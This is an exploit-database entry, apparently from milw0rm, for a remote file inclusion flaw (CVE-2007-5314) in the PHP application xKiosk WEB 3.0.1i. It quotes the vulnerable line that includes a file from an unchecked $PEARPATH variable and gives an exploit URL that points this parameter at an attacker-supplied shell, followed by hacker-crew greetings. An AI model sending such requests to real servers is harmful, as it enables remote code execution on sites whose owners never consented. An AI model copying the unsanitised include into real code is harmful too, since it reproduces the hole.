xKiosk 3.0.1i - 'xkurl.php?PEARPATH' Remote File Inclusion
Author: h4ck3r
type: webapps
platform: php
port:
date_added: 2007-10-07
date_updated:
verified: 1
codes: OSVDB-37620;CVE-2007-5314
tags:
aliases:
screenshot_url:
application_url:
xKiosk WEB <= (PEARPATH) Remote File Include Vulnerability
Script : xKiosk WEB
Version : 3.0.1i
Download : http://xkiosk.net/xkiosk.3.0.1j.web.zip
AUTHOR : BorN To K!LL
Vuln Code :
include($PEARPATH.'Client.php');
3xpl0!T :
[p4th]/system/funcs/xkurl.php?PEARPATH=[-SHell-]
Greetings 2 :
str0ke - Dr.2 - AsbMay's Group - GoLd_M - KuWaiT SeCuriTy ..
BorN To K!LL <> GoLd_M = 4ever ... =P
# milw0rm.com [2007-10-08]